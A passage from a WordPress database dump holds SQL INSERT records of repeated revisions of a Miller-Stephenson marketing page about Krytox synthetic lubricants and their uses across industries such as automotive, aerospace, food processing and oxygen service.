consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:51:40', '2016-09-28 19:51:40', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2128, 2, '2016-09-28 19:52:30', '2016-09-28 19:52:30', '<p style="text-align: center;"><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n<br><br/>\r\n<br><br/>\r\n<br><br/>\r\n<br><br/>\r\n<br><br/>\r\n\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:52:30', '2016-09-28 19:52:30', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2129, 0, '2016-09-28 19:56:44', '2016-09-28 19:56:44', '', '', '', 'publish', 'closed', 'closed', '', '2129', '', '', '2016-09-28 19:56:44', '2016-09-28 19:56:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/2129/', 0, 'nf_sub', '', 0); 
